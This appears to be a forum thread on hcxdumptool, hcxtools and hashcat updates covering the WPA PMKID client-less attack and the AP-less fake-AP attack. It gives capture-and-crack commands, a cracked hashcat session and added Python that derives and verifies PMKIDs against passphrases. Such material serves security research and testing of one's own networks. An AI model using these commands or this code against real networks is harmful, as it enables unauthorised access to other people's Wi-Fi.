file name....................: fils-handshake.pcapng
file type....................: pcapng 1.0
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 92
skipped packets..............: 0
packets with FCS.............: 0
beacons......................: 25
probe responses..............: 2
association requests.........: 2
association responses........: 2
authentications (OPEN SYSTEM): 2
authentications (FILS).......: 2
deauthentications............: 5
action packets...............: 5
EAPOL packets................: 4
EAP packets..................: 6
found........................: EAP type ID
found........................: EAP-PSK Authentication

Get the example cap from here:
https://github.com/vanhoefm/wifi-example...ake.pcapng

Retrieved identity is in identitylist.

hcxpcaptool: added detection of BROADCOM specific authentication

BROADCOM adds a special vendor tag to the authentication sequence:
Tagged parameters (11 bytes)
Tag: Vendor Specific: Broadcom
Tag Number: Vendor Specific (221)
Tag length: 9
OUI: 00:10:18 (Broadcom)
Vendor Specific OUI Type: 2
Vendor Specific Data: 0202000c0000

From now on, hcxdumptool and hcxpcaptool are able to capture and detect this:
$ hcxpcaptool -V broadcomtag.pcap
start reading from broadcomtag.pcap
summary:
file name....................: broadcomtag.pcap
file type....................: pcap 2.4
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 2
skipped packets..............: 0
packets with FCS.............: 0
authentications (OPEN SYSTEM): 2
authentications (BROADCOM)...: 1

hcxpcaptool: added detection of SONOS specific authentication

SONOS adds a special vendor tag to the authentication sequence, too:
Tagged parameters (8 bytes)
Tag: Vendor Specific: Sonos, Inc.
Tag Number: Vendor Specific (221)
Tag length: 6
OUI: 00:0e:58 (Sonos, Inc.)
Vendor Specific OUI Type: 2
Vendor Specific Data: 020101

From now on, hcxdumptool and hcxpcaptool are able to capture and detect this:

$ hcxpcaptool -V sonostag.pcap
start reading from sonostag.pcap
summary:
file name....................: sonostag.pcap
file type....................: pcap 2.4
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 1
skipped packets..............: 0
packets with FCS.............: 0
authentications (OPEN SYSTEM): 1
authentications (SONOS)......: 1

hcxpcaptool: added detection of SONOS and APPLE specific authentication.

APPLE adds a special vendor tag to the authentication sequence, too:
Tagged parameters (13 bytes)
Tag: Vendor Specific: Apple, Inc.
Tag Number: Vendor Specific (221)
Tag length: 11
OUI: 00:17:f2 (Apple, Inc.)
Vendor Specific OUI Type: 10
Vendor Specific Data: 0a00010400000000


From now on, hcxdumptool and hcxpcaptool are able to capture and detect this:
$ hcxpcaptool -V tags.pcap
start reading from tags.pcap
summary:
file name....................: tags.pcap
file type....................: pcap 2.4
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 4
skipped packets..............: 0
packets with FCS.............: 0
authentications (OPEN SYSTEM): 4
authentications (SONOS)......: 1
authentications (APPLE)......: 3


Those are really nice fingerprints!


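The vendor fingerprints above come from tag 221 (Vendor Specific) information elements in the authentication frame body. As an added example of mine (not code from hcxpcaptool or hcxdumptool), here is a parser that walks the tagged parameters, picks out the vendor-specific elements and maps their OUI to the three vendors the post names, with a per-vendor count like the "authentications (SONOS)/(APPLE)" summary lines. The three sample elements are rebuilt byte for byte from the Wireshark decodes quoted above (the "Vendor Specific Data" shown there includes the OUI type byte, which is why 3 + 6 = 9 for Broadcom); the Open System fixed fields and the truncation handling are my assumptions.

```python
from collections import Counter

TAG_VENDOR_SPECIFIC = 221

# OUI -> vendor name, the three vendors named in the post.
KNOWN_OUIS = {
    bytes.fromhex("001018"): "Broadcom",
    bytes.fromhex("000e58"): "Sonos, Inc.",
    bytes.fromhex("0017f2"): "Apple, Inc.",
}


def parse_tagged_parameters(body):
    """Walk 802.11 information elements (tag, length, value). Returns the list
    of (tag, value) pairs and whether the body ended cleanly; an element whose
    declared length runs past the end stops parsing and is not returned."""
    ies, i = [], 0
    while i + 2 <= len(body):
        tag, length = body[i], body[i + 1]
        if i + 2 + length > len(body):
            return ies, False
        ies.append((tag, body[i + 2:i + 2 + length]))
        i += 2 + length
    return ies, i == len(body)


def vendor_fingerprints(tagged):
    """Return [(vendor name or OUI hex, vendor data hex)] for every tag 221
    element with at least an OUI in it."""
    ies, _clean = parse_tagged_parameters(tagged)
    out = []
    for tag, value in ies:
        if tag != TAG_VENDOR_SPECIFIC or len(value) < 3:
            continue
        oui, data = value[:3], value[3:]
        out.append((KNOWN_OUIS.get(oui, oui.hex()), data.hex()))
    return out


# Fixed fields of an Open System authentication frame (algorithm 0, sequence
# number 1, status 0; each a little-endian 16-bit field) precede the tags.
AUTH_OPEN_FIXED = bytes.fromhex("000001000000")


def auth_frame_fingerprints(frame_body):
    """Skip the six fixed bytes of an authentication frame body, then
    fingerprint its tagged parameters."""
    if len(frame_body) < len(AUTH_OPEN_FIXED):
        return []
    return vendor_fingerprints(frame_body[len(AUTH_OPEN_FIXED):])


def count_by_vendor(frame_bodies):
    """Authentication frames per detected vendor, like hcxpcaptool's summary."""
    counts = Counter()
    for body in frame_bodies:
        for vendor, _data in auth_frame_fingerprints(body):
            counts[vendor] += 1
    return counts


# Constructed sample elements, byte for byte from the decodes quoted above.
BROADCOM_IE = bytes([221, 9]) + bytes.fromhex("001018") + bytes.fromhex("0202000c0000")
SONOS_IE = bytes([221, 6]) + bytes.fromhex("000e58") + bytes.fromhex("020101")
APPLE_IE = bytes([221, 11]) + bytes.fromhex("0017f2") + bytes.fromhex("0a00010400000000")

if __name__ == "__main__":
    frames = [AUTH_OPEN_FIXED + SONOS_IE] + [AUTH_OPEN_FIXED + APPLE_IE] * 3
    for body in frames:
        print(auth_frame_fingerprints(body))
    print(count_by_vendor(frames))   # the tags.pcap summary: 1 Sonos, 3 Apple
```

The same walk applies to any management frame once its fixed fields are skipped, so probe and association requests can be fingerprinted the same way; unknown OUIs come back as their hex so new vendors show up instead of being silently dropped.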

freeroute (Moderator)
Wed, 25 Jul 2018 @ 20:04:50

hcxdumptool and hcxtools: moved to v4.2.0 rc1
Added a completely new WPA attack mode according to the new hashcat hash modes 16800 and 16801.

Changelog:

25.07.2018
==========
hcxtools moved to 4.2.0 rc1
hcxpcaptool:
added hashmodes -m 16800 and -m 16801
and new options:
-z file : output PMKID file (hashcat hashmode -m 16800 - WPA*-PMKID-PBKDF2)
-Z file : output PMKID file (hashcat hashmode -m 16801 - WPA*-PMKID-PMK)
use hcxdumptool as dumper/attacker, convert with hcxpcaptool, retrieve the PSK using hashcat

removed wlandump-ng (old school, deprecated)
removed wlancap2hcx (old school, deprecated)

Advantage:
only 2 packets required
1 association request/reassociation request (probe response is ok, too)
2 EAPOL 1/4 (M1) with included RSN IE

Remember the ap-less attack:
only 2 packets required
1 association request/reassociation request (probe request is ok, too)
2 EAPOL 2/4 (M2) as response to hcxdumptool

Just use hcxdumptool to capture, hcxpcaptool to convert and hashcat to crack.

hcxtools update: 4.2.0 rc1
added new attack mode on WPA PMKID

$ hcxpcaptool -z hashfile.16800 pmkidassociationrequest.pcapng
start reading from pmkidassociationrequest.pcapng
summary:
file name....................: pmkidassociationrequest.pcapng
file type....................: pcapng 1.0
file hardware information....: unknown
file os information..........: unknown
file application information.: unknown
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 3
skipped packets..............: 0
packets with FCS.............: 0
association requests.........: 1
association responses........: 1
EAPOL packets................: 1
EAPOL PMKIDs.................: 1

1 PMKID(s) written to hashfile.16800

$ hashcat -m 16800 hashfile.16800 wordlist

Source: https://hashcat.net/forum/thread-6661-post-41220.html#pid41220



freeroute (Moderator)
Thu, 26 Jul 2018 @ 09:13:11

In connection with hashcat mode 16800:

"The tools are 100% compatible to hashcat and John the Ripper and recommended by hashcat. This branch is pretty closely synced to hashcat git branch (that means: latest hcxtools matching on latest hashcat beta)."

It works with the latest hashcat git.



PixL
Status: n/a
Joined: Fri, 14 Apr 2017
Posts: 112
Reputation: 10
Fri, 27 Jul 2018 @ 14:53:36

Please can you build hcxdumptool for OpenWRT/Lede? It would work so well on a WiFi Pineapple!


BTC: 13kXxHdNutoykbg66c3vb8MwGuLkNGjfAC

1 x GTX 1050

freeroute
Moderator
Status: Trusted
Joined: Sat, 16 Jul 2016
Posts: 2325
Reputation: 7872
Sat, 04 Aug 2018 @ 18:14:25

New attack on WPA/WPA2 using PMKID

In order to make use of this new attack you need the following tools:
hcxdumptool v4.2.0 or higher
hcxtools v4.2.0 or higher
hashcat v4.2.0 or higher

This attack was discovered accidentally while looking for new ways to attack the new WPA3 security standard. WPA3 will be much harder to attack because of its modern key establishment protocol called "Simultaneous Authentication of Equals" (SAE).

The main difference from existing attacks is that in this attack, capture of a full EAPOL 4-way handshake is not required. The new attack is performed on the RSN IE (Robust Security Network Information Element) of a single EAPOL frame.

At this time, we do not know for which vendors or for how many routers this technique will work, but we think it will work against all 802.11i/p/q/r networks with roaming functions enabled (most modern routers).

The main advantages of this attack are as follows:
- No more regular users required - because the attacker directly communicates with the AP (aka "client-less" attack)
- No more waiting for a complete 4-way handshake between the regular user and the AP
- No more eventual retransmissions of EAPOL frames (which can lead to uncrackable results)
- No more eventual invalid passwords sent by the regular user
- No more lost EAPOL frames when the regular user or the AP is too far away from the attacker
- No more fixing of nonce and replaycounter values required (resulting in slightly higher speeds)
- No more special output format (pcap, hccapx, etc.) - final data will appear as regular hex encoded string

Source and more info: https://hashcat.net/forum/thread-7717-post-41427.html#pid41427
Hcxtools update: https://hashcat.net/forum/thread-6661-post-41341.html#pid41341
Hashcat update: https://hashcat.net/forum/thread-7711-post-41425.html#pid41425


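Both the first post (hcxpcaptool -z and hashcat -m 16800) and the post above come down to one computation: the PMKID carried in the RSN IE of the M1 is a keyed hash over the PMK and the two MAC addresses, which is why a single frame is enough and why the hash line is plain hex. The following is an added example, not hcxtools or hashcat code, that derives that PMKID in Python and parses and verifies a mode 16800 line; the MACs, ESSID and passphrase are constructed sample values.

```python
import hashlib
import hmac

# Added example (not hcxtools or hashcat code): derive the PMKID that hashcat
# modes 16800/16801 test and parse/verify a 16800 hash line. hcxpcaptool -z
# writes one line per PMKID in the form PMKID*MAC_AP*MAC_STA*ESSID_hex.

def pmk_from_passphrase(passphrase: str, essid: bytes) -> bytes:
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid, 4096, 32)

def pmkid(pmk: bytes, mac_ap: bytes, mac_sta: bytes) -> bytes:
    """IEEE 802.11i: PMKID = HMAC-SHA1-128(PMK, "PMK Name" | AA | SPA).
    Only the PMK and both MACs go in, so a single EAPOL M1 carrying the
    RSN IE PMKID is enough; no nonces or replay counters are involved."""
    msg = b"PMK Name" + mac_ap + mac_sta
    return hmac.new(pmk, msg, hashlib.sha1).digest()[:16]

def parse_16800(line: str):
    """Split a 16800 line into (pmkid, mac_ap, mac_sta, essid) as bytes."""
    parts = line.strip().split("*")
    if len(parts) != 4:
        raise ValueError("expected PMKID*MAC_AP*MAC_STA*ESSID_hex")
    h, ap, sta, essid = (bytes.fromhex(p) for p in parts)
    if len(h) != 16 or len(ap) != 6 or len(sta) != 6:
        raise ValueError("bad field length in 16800 line")
    return h, ap, sta, essid

def build_16800(h: bytes, ap: bytes, sta: bytes, essid: bytes) -> str:
    return "*".join(x.hex() for x in (h, ap, sta, essid))

def verify_passphrase(line: str, passphrase: str) -> bool:
    """Mode 16800: the candidate is a passphrase; PBKDF2 dominates the cost."""
    h, ap, sta, essid = parse_16800(line)
    return hmac.compare_digest(h, pmkid(pmk_from_passphrase(passphrase, essid), ap, sta))

def verify_pmk(line: str, pmk_hex: str) -> bool:
    """Mode 16801: the candidate is the 32-byte PMK itself (no PBKDF2)."""
    h, ap, sta, _ = parse_16800(line)
    return hmac.compare_digest(h, pmkid(bytes.fromhex(pmk_hex), ap, sta))

# Constructed sample (not a real capture), reusing the MACs, ESSID and
# passphrase from the thread's hcxpsktool demo.
SAMPLE_AP = bytes.fromhex("112233445566")
SAMPLE_STA = bytes.fromhex("aabbccddeeff")
SAMPLE_ESSID = b"freeroute"
SAMPLE_PMK = pmk_from_passphrase("freeroute2018", SAMPLE_ESSID)
SAMPLE_LINE = build_16800(pmkid(SAMPLE_PMK, SAMPLE_AP, SAMPLE_STA),
                          SAMPLE_AP, SAMPLE_STA, SAMPLE_ESSID)
```

Checking a line against the passphrase you configured on your own AP is a quick way to confirm that a capture really came from that AP and that the AP does hand out a PMKID.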

freeroute
Moderator
Status: Trusted
Joined: Sat, 16 Jul 2016
Posts: 2325
Reputation: 7872
Tue, 07 Aug 2018 @ 21:59:32

New article: https://thehackernews.com/2018/08/how-to-hack-wifi-password.html



freeroute
Moderator
Status: Trusted
Joined: Sat, 16 Jul 2016
Posts: 2325
Reputation: 7872
Fri, 31 Aug 2018 @ 00:23:24

30.08.2018
==========
hcxdumptool update.
iw functionality added!
Now hcxdumptool will set monitor mode and bring up the interface!
Previous interface settings will be restored when hcxdumptool terminates.

More info: https://hashcat.net/forum/thread-6661-post-41832.html#pid41832



vtar
Status: n/a
Joined: Wed, 07 Mar 2018
Posts: 126
Reputation: 6
Fri, 31 Aug 2018 @ 04:01:13

Is this included in hashcat?


freeroute
Moderator
Status: Trusted
Joined: Sat, 16 Jul 2016
Posts: 2325
Reputation: 7872
Fri, 31 Aug 2018 @ 20:27:44

No. This tool is not included in hashcat.
But hcxtools is closely synced to the hashcat git branch (that means: the latest hcxtools matches the latest hashcat beta) and to the John the Ripper git branch "bleeding-jumbo".



freeroute
Moderator
Status: Trusted
Joined: Sat, 16 Jul 2016
Posts: 2325
Reputation: 7872
Tue, 04 Sep 2018 @ 19:51:31

hcxdumptool update - 04.09.2018
==========
improved rcascan (show time and access points which hide their ESSID)
prepare detection of PMF
refactored access point handling
handle 4096 access points simultaneously
refactored client handling
handle 4096 clients simultaneously
speed up retrieving PMKIDs (< 1 minute)
attack access points which hide their ESSID
increased filter list line length
increased filter list maximum entries
added option to show beacons in status output:
--enable_status= digit : enable status messages
bitmask:
1: EAPOL
2: PROBEREQUEST/PROBERESPONSE
4: AUTHENTICATION
8: ASSOCIATION
16: BEACON

added option to choose station chipset:
--station_chipset digit : use this chipset for station
0: transmit no chipset information (default)
1: Broadcom
2: Apple-Broadcom
3: Sonos



freeroute
Moderator
Status: Trusted
Joined: Sat, 16 Jul 2016
Posts: 2325
Reputation: 7872
Sat, 22 Sep 2018 @ 10:37:48

hcxpsktool -- support for PMKID hash file
Note: hcxpsktool is a part of hcxtools.

This version is experimental and not all functions (from wlanhcx2psk) are implemented yet.

root@HELIUM-XR02:/usr/local/src/hcxtools# hcxpsktool -h
hcxpsktool 4.2.1 (C) 2018 ZeroBeat
usage:
hcxpsktool options

Options:
-i file : input EAPOL hash file (hccapx)
-z file : input PMKID hash file
-e file : input ESSID
-b file : input MAC access point
format: 112233445566
-o file : output PSK file
default: stdout
output list must be sorted unique!

hcxpsktool calculates about a 5 MB wordlist with possible candidates from MAC and ESSID combinations (will be committed soon on github).
The following variants are implemented so far.

COMMAND: "hcxpsktool -b 001122334455 -e networkname -o candidates.txt"

https://transfer.sh/1n0Cc/candidates.txt

Usage:
root@HELIUM-XR02:/usr/local/src/hcxcalc# hcxpsktool -e freeroute -b 112233445566 | hashcat --force -m 2500 test.hccapx

fc1e13ef6c24866848dc38113fc1b7a0:112233445566:aabbccddeeff:freeroute:freeroute2018

Session..........: hashcat
Status...........: Cracked
Hash.Type........: WPA/WPA2
Hash.Target......: freeroute (AP:11:22:33:44:55:66 STA:aa:bb:cc:dd:ee:ff)
Time.Started.....: Sat Sep 22 11:18:35 2018 (4 mins, 1 sec)
Time.Estimated...: Sat Sep 22 11:22:36 2018 (0 secs)
Guess.Base.......: Pipe
Speed.Dev.#1.....: 268 H/s (7.28ms)
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 64640
Rejected.........: 0
Restore.Point....: 0
Candidates.#1....: 1992freeroute -> FREEROUTE5
HWMon.Dev.#1.....: N/A

Started: Sat Sep 22 11:18:34 2018



PixL
Status: n/a
Joined: Fri, 14 Apr 2017
Posts: 112
Reputation: 10
Sat, 22 Sep 2018 @ 18:23:25

freeroute said:

hcxpsktool -- support for PMKID hash file
Note: hcxpsktool is a part of hcxtools.

This version is experimental and not all functions (from wlanhcx2psk) are implemented, yet.

root@HELIUM-XR02:/usr/local/src/hcxtools# hcxpsktool -h
hcxpsktool 4.2.1 (C) 2018 ZeroBeat
usage:
hcxpsktool options

Options:
-i file : input EAPOL hash file (hccapx)
-z file : input PMKID hash file
-e file : input ESSID
-b file : input MAC access point
format: 112233445566
-o file : output PSK file
default: stdout
output list must be sorted unique!

hcxpsktool calculates about 5 MB wordlist with possible candiates of MAC and ESSID combinations (will be committed soon on github)
The following variants are implemented, yet.

COMMAND: "hcxpsktool -b 001122334455 -e networkname -o candidates.txt"

https://transfer.sh/1n0Cc/candidates.txt

Usage:
root@HELIUM-XR02:/usr/local/src/hcxcalc# hcxpsktool -e freeroute -b 112233445566 | hashcat --force -m 2500 test.hccapx

fc1e13ef6c24866848dc38113fc1b7a0:112233445566:aabbccddeeff:freeroute:freeroute2018

Session..........: hashcat
Status...........: Cracked
Hash.Type........: WPA/WPA2
Hash.Target......: freeroute (AP:11:22:33:44:55:66 STA:aa:bb:cc:dd:ee:ff)
Time.Started.....: Sat Sep 22 11:18:35 2018 (4 mins, 1 sec)
Time.Estimated...: Sat Sep 22 11:22:36 2018 (0 secs)
Guess.Base.......: Pipe
Speed.Dev.#1.....: 268 H/s (7.28ms)
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 64640
Rejected.........: 0
Restore.Point....: 0
Candidates.#1....: 1992freeroute -> FREEROUTE5
HWMon.Dev.#1.....: N/A

Started: Sat Sep 22 11:18:34 2018

So this assumes the PSK might have been produced by some algorithm which uses the SSID and MAC; how common is this?



freeroute
Moderator
Status: Trusted
Joined: Sat, 16 Jul 2016
Posts: 2325
Reputation: 7872
Sat, 29 Sep 2018 @ 12:48:28

hcxtools update
29.09.2018
==========

hcxpcaptool: removed option -Z
Allow hashfile for -m 16800 to be used with -m 16801

https://github.com/hashcat/hashcat/commit/1b980cf01000c81dfd0ca085593f8c1d66d43188



payknight
Status: Cracker
Joined: Wed, 13 Apr 2016
Posts: 502
Team: just4fun
Reputation: 349
Sat, 29 Sep 2018 @ 13:22:13

Just to make sure, I will explain what AP-less means and what client-less means (if I am wrong, correct me).


Client-less means that the router, aka AP, itself sends a PMKID to whoever is trying to connect to it, which is an EAPOL packet, so even if there is no client attached to the AP, you "as an attacker/pen tester", aka hcxdumptool, will try to connect to the AP yourself to see if it sends a PMKID. If it does, it will show "PMKID found".
Again, you will receive the PMKID ONLY when the AP is nearby and vulnerable (by sending the PMKID).


AP-less means: if a phone/PC/device does a probe request and in its probe request (broadcast request) there is a name, hcxdumptool will create a fake AP with the same ESSID, so when the device sees that AP it will try to connect to it; hcxdumptool then catches the handshake and closes/turns off that fake AP.


+rep if i helped
BTC : 1PAyKniGHt7yyCb8HdsziTHBEFX6zkGSHz

freeroute
Moderator
Status: Trusted
Joined: Sat, 16 Jul 2016
Posts: 2325
Reputation: 7872
Sat, 29 Sep 2018 @ 13:40:32

Thanks.
It is correct.
In the case of the "Client-less" attack we can get/capture only unauthenticated handshakes (M1/M2), because we are not able to calculate an M3.



meso
Status: Banned
Joined: Wed, 19 Sep 2018
Posts: 25
Reputation: 0
Sat, 29 Sep 2018 @ 13:48:10


This is great, so we can use the AP-less attack to get a handshake by
using a different BSSID from the one of the true AP?


freeroute
Moderator
Status: Trusted
Joined: Sat, 16 Jul 2016
Posts: 2325
Reputation: 7872
Sat, 29 Sep 2018 @ 14:00:26

meso said:

This is great, so we can use the AP-less attack to get a handshake by
using a different BSSID from the one of the true AP?

Yes. This is correct.

Great thread in this topic:
https://hashcat.net/forum/thread-6661-page-6.html
https://hashcat.net/forum/thread-6745-post-36007.html#pid36007


